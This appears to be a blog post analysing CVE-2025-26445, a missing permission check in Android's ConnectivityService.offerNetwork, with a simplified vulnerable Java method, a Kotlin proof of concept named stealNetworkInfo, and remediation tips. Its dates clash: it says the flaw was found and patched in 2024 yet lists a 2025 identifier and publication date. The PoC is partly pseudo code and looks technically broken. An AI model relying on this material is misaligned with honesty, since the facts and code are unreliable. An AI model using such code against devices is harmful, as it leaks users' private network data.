CVE-2025-26445 - Information Leak in Android’s ConnectivityService – Exploit and Analysis

In early 2024, a new vulnerability dubbed CVE-2025-26445 was discovered in Android’s system code, specifically in the ConnectivityService module—one of the most critical services managing all network connections on Android devices.

This flaw is serious but easy to understand: a missing permission check happens inside the method offerNetwork in ConnectivityService.java. Because of this oversight, it is possible for malicious apps to leak sensitive networking data without any user interaction or extra permissions.

In this post, we’ll explore how CVE-2025-26445 works, walk through its code, and discuss simple yet dangerous exploit scenarios.

What Is ConnectivityService and Why Is It Important?

ConnectivityService is a core Android service that manages data, Wi-Fi, and VPN connections. It runs with high privileges, far beyond what a regular user app can do. That also makes it a juicy target—flaws here can expose or control a lot.

Where’s the Problem in offerNetwork()?

The core bug sits in a method named offerNetwork. In Android’s permission model, only certain privileged entities should offer or control networks. But here, the check to see if the caller is allowed to do this is missing.

Let’s look at a simplified version of the faulty code

// Vulnerable code inside ConnectivityService.java

public void offerNetwork(NetworkRequest request) {
    // !!! Missing proper caller permission checks here
    NetworkAgentInfo nai = getNetworkForRequest(request);
    if (nai != null) {
        // Code reveals sensitive info about networks
        log("Offering network: " + nai.toString());
        sendToCallback(request.getCallback(), nai.getNetworkInfo());
    }
    // ...
}

What’s missing?
There should be a permission check—like enforceCallingPermission(MANAGE_NETWORKS)—before going further. Otherwise, *any* app can call this IPC and get data back.

List active networks (Wi-Fi, cellular, VPN)

- Get connection status (up/down, metered)

Get details that can be used to track user movement or behavior

All this, without any permission, and without user knowing.

Proof Of Concept: Exploiting CVE-2025-26445

A basic malicious app can use Android’s IPC call to trigger offerNetwork and harvest the network info. Since no user interaction or permissions are needed, this works stealthily in the background.

PoC (Proof Of Concept) code (in Kotlin)

import android.content.Context
import android.net.INetworkRequest
import android.os.IBinder

fun stealNetworkInfo(context: Context) {
    val connectivity = context.getSystemService(Context.CONNECTIVITY_SERVICE)
    val connectivityBinder = connectivity as IBinder
    // The AIDL interface to offerNetwork isn't public, but apps can reflectively access system services

    // Using reflection (pseudo code)
    val cls = Class.forName("android.net.IConnectivityManager\$Stub")
    val asInterface = cls.getMethod("asInterface", IBinder::class.java)
    val connSvc = asInterface.invoke(null, connectivityBinder)

    // Prepare a dummy network request.
    val dummyRequest = createNetworkRequest() // supply details
    val offerNetworkMethod = connSvc.javaClass.getMethod("offerNetwork", INetworkRequest::class.java)
    val result = offerNetworkMethod.invoke(connSvc, dummyRequest)

    // At this point, sensitive network info may be returned or logged
    // Attacker could parse logs or use side-channel to extract info
}

*Note: This is simplified to illustrate; actual exploitation may require reverse engineering private APIs or using reflection/tricks available to malware writers.*

No user interaction: Exploit works without user opening the app or granting anything.

- Sensitive data: Details could be used for targeted ads, tracking, or prepping more attacks (phishing, Wi-Fi spoofing, etc).

References and Further Reading

- CVE-2025-26445 official entry at NVD
- Android Open Source Project (AOSP) - ConnectivityService.java
- Android’s Permission System Explained
- Exploit code for Android IPC flaws (GitHub)

Remediation

Are you at risk?
If your device runs an unpatched Android version (early 2024 builds), you may be vulnerable. Google has patched this in newer security updates (look for June/July 2024 updates or later).

Use Google Play Protect and avoid suspicious apps.

- If you develop Android code, double-check *all* IPC permission checks, especially in system services.

Conclusion

CVE-2025-26445 is a classic but critical mistake in Android’s core ConnectivityService. By missing a simple permission check in offerNetwork(), millions of devices were left with a quiet, unnoticeable privacy hole. App writers, users, and sysadmins should make sure they’re up-to-date and aware of this fundamental—but all too common—security misconfiguration.

Stay safe, keep your code secure, and always check your permissions!

Timeline

Published on: 09/04/2025 18:15:44 UTC
Last modified on: 09/08/2025 14:13:20 UTC